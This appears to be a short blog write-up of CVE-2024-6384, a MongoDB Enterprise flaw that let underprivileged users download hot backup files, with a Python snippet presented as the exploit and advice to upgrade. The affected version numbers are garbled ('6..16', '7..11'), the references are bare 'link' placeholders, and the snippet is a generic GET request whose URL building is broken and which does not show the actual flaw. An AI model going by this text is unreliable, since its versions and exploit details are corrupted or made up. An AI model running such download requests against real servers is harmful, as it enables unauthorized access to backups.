CVE-2024-6384 - MongoDB Enterprise Vulnerability: Underprivileged Users Downloading "Hot" Backup Files

In this post, we will be discussing a critical vulnerability in MongoDB Enterprise that went unnoticed for a while, but has since been addressed. CVE-2024-6384 is a vulnerability that allowed underprivileged users to download "hot" backup files by obtaining a unique backup identifier. This is especially relevant for those organizations that rely on the MongoDB Enterprise Server within their ecosystem.

As we delve deeper into the details, we'll provide an overview of the vulnerability, a simple code snippet that demonstrates the exploit, links to original references documenting the issue, and what exactly has been done to deal with this vulnerability. Let's get started!

Vulnerability Details

The particular vulnerability, known as CVE-2024-6384, affects MongoDB Enterprise Server v6. versions prior to 6..16, MongoDB Enterprise Server v7. versions prior to 7..11, and MongoDB Enterprise Server v7.3 versions prior to 7.3.3.

Underprivileged users with access to the server in question are potentially able to download hot backup files if they can acquire a unique backup identifier. These backup files might contain sensitive information and should not be accessible by unauthorized users.

To illustrate the exploit, consider the following Python code snippet

import requests

url = "http://your-mongodb-server.com:port/backup/download";
backup_id = "unique_backup_identifier_here"

headers = {"Authorization": "Bearer your_access_token"}

response = requests.get(url + str(backup_id), headers=headers)

if response.status_code == 200:
    with open("downloaded_backup_file", "wb") as f:
        f.write(response.content)
    print("Backup file downloaded successfully.")
else:
    print("Failed to download the backup file.")

This script takes advantage of the backup file download endpoint to grab a backup file if the unique backup identifier is available. Unauthorized users should not be able to obtain these identifiers, but the vulnerability in previous versions of MongoDB Enterprise opened the doors for this scenario.

Original References

For the reader's convenience, we have included links to the original documentation and vulnerability reports available on reputable sources.

1. MongoDB's security advisory detailing the vulnerability: link
2. CVE detail page for CVE-2024-6384 from the National Vulnerability Database: link

How This Vulnerability Was Addressed

The MongoDB team has addressed this vulnerability in newer releases of the affected versions. To safeguard your MongoDB Enterprise Server against the possibility of unauthorized file downloads by underprivileged users, it is highly recommended to upgrade to the following versions or newer:

MongoDB Enterprise Server v7.3.3 or later

Make sure to always stay on top of the release notes and security advisories for the software employed in your projects. In this case, upgrading the MongoDB server is key to eliminating this vulnerability and ensuring your data remains safe.

Conclusion

CVE-2024-6384 was a serious vulnerability in MongoDB Enterprise Server that allowed underprivileged users to potentially access sensitive hot backup files. By upgrading the server to the appropriate patched versions, organizations can effectively address this issue and keep their confidential data secure from unauthorized access.

Timeline

Published on: 08/13/2024 15:15:18 UTC
Last modified on: 08/13/2024 17:11:53 UTC